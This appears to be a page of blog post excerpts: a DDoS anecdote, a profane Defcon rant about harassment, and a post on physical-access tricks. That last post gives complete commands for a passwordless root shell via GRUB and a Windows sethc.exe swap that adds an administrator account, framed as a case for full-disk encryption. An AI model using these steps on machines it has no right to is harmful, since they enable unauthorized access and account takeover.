2. Botnets and DDoSing

   I was recently the Distributed Denial of Service (DDoS) target of a known Chinese botnet. Why some random Chinese botmaster decided to target me, I have no clue. Fortunately, the attack didn’t really do any damage because I use CloudFlare. Which is awesome (and free!). It made it slightly more difficult for me to update my blog, and I ended having to go into Wordpress though the frontend after tunneling to the server over the Tor network. But, due to CloudFlare, my sight stayed up throughout the entire attack, which lasted several days. Take that, Chinese hackers!

   I mostly wanted to say that I just tested a new web server stress analyzer, called Hailstorm, made by some of my friends over at Radical Designs. It’s basically a website (with a pretty UI!) that you tell to go to your website, and it attempts to DDoS your website, and then gives you a bunch of pretty graphs and charts on what happened. I set the concurrent threads to their highest setting at 1000, and the maximum requests to the highest setting at 5000. I gave Hailstorm the highest bandwidth requests I could muster, like some of my music files and artwork. My site didn’t flinch. Not one bit. I even Hailstormed this site several times within a period of a few minutes. Nothing.

   So, Hailstorm, you didn’t really tell me anything. You should allow your maximum requests and concurrent thread settings to go way higher. I guess if you did tell me anything, you told me that that Chinese botnet was a giant scary monster of a botnet. Which told me, in turn, that CloudFlare is an even more giant monster, albeit less scary. Thanks, Hailstorm and CloudFlare, for teaching me things!

   And, fuck you, Chinese botmaster.

   read more

3. Defcon Report Back, Intro

   I’m sitting in McCarren Internation Airport in Las Vegas, Nevada, killing the next two hours over a slow 3G connection. This was my first time going to Defcon. I remember watching videos of Defcon talks on my home-built computer when I was nine or so. In fifth grade, I had a crush on Zoz. I don’t remember why I thought they were the shit – maybe it was the skinny-nerdy-queerish-blond-mohawk-hacker-person-who-makes-fake-crop-circles-for-their-Ph.D.-thesis thing. I really wanted to go to MIT at that age, and Zoz was my hero. Hey, don’t make fun of me. I was nine, okay?

   Hop in your blue telephone box and skip forward a decade or so, and I’m at my first Defcon. It was also my first time staying in Las Vegas. Fuck this town. It’s everything that went wrong with capitalism amplified and tarballed into a single sexism-infected package, wrapped in a sick slime of wealth, extreme classism, greed, extra sexism (for good measure), and a heaping sporkful of objectification of female-bodied folk on the side. Fuck. You. Las. Vegas.

   And fuck everyone who assumes that I’m a girl because I currently live in a female-body. Fuck all the time burglars who think it’s okay to talk to me without asking if I feel social. Fuck the bro-”hacker”s who think it’s okay to buy me drinks – and then try to talk to me! – as if I desired either one. Fuck the goon who asked if my face tattoo was real, and then licked his finger and wiped my face…after I had declined his marriage proposition. Fuck the socially inept geek boys who think hugging/touching me without consent is okay, just because I can geek out on neural networks, exploit-dev, 0-days, and cryptography. Don’t any of you turd-gurglers realize that I have anxiety issues on top of neurological problems, and the former is caused by sexual and physical abuse at the hands of males? I don’t know, maybe something about my body language, the fact that I clench my fists and stand five feet away from whoever I’m talking to? Might be a hint, I don’t know. And fuck the people who indiscriminately referred to me as she, even after syntax correction. Fuck that fed that thought it was okay to ask me a bunch of sketchy questions, then not pick up on my disinclination towards communication, then ask me if I wanted to come to his hotel room and take E and huff nitrous. Sorry, dude. I don’t fucking talk to feds. I don’t talk to people who work for the Department of Homeland Security. I don’t give out any information to military, or military contractors. I don’t talk to cops. I piss on cop sympathizers. Fuck the sociopathic prison industry contractors. Fuck you all. Not my team. Not my fucking team.

   /rant

   So, the talks at defcon were highly informative, and it was incredibly …

   read more

4. Cute Physical Access Tricks

   They’re cute because they’re so adorably simplistic:

   If you have physical access to a Linux box, do:

   Press ESC at the grub prompt.

   Press e for edit.

   Highlight the line that begins kernel ………, press e

   Go to the very end of the line, add rw init=/bin/bash

   press enter, then press b to boot your system.

   Your system will boot up to a passwordless root shell.

   For situations with physical access to a Windows box, boot into a live Linux USB/CD and do:

   mkdir /mnt/ntfs

   mount -t captive-ntfs /dev/hda1 /mnt/ntfs

   cd /mnt/ntfs/windows/system32

   mv sethc.exe sethc.old; cp cmd.exe sethc.exe

   sync

   cd \~

   umount /mnt/ntfs

   shutdown –r

   Then, in the shell which appears, make an admin account by doing:

   NET USER admin password /add

   NET LOCALGROUP administrators admin /add

   Of course, neither of these work if you’re using full-disk encryption. So, Windows users: use TrueCrypt! And Linux users: use ecryptfs andluks! Dualbooters can use this tutorial. And Mac users…from my understanding, you’re fucked and there’s no way to full-disk encrypt a Mac, but I don’t use Macs, so I could be wrong. Hey, it’s the price you pay for having a hipster computer. /snark!

   And full-disk encryption doesn’t void flaws in physical security issues, such as presented in the Evil Maid or Cold Boot attacks. Duh. If they can physically get to your computer, especially if they can get to it and then come back to it later, you’re still fucked.

   read more

⇇ « Page 2 / 2